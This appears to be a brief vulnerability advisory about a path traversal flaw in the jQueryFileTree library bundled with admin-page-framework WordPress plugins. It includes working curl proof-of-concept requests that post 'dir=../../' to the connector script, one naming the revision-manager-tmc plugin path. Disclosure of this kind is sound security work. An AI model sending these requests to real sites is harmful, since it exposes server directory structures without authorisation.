The plugins are using the admin-page-framework framework which is shipped with the outdated and no longer maintained library jQueryFileTree known to be affected by a path traversal issue, allowing unauthenticated attackers to disclose the folder structure of the web server
curl 'https://example.com/wp-content/plugins/<affected-plugin>/<path-to-jQueryFileTree-lib>/connectors/jqueryFileTreePlus.php' -d "dir=../../" -e "xx"
e.g: curl 'https://example.com/wp-content/plugins/revision-manager-tmc/vendor/tmc/admin-page-framework/custom-field-types/path-custom-field-type/connectors/jQueryFileTreePlus.php' -d "dir=../../" -e "xx"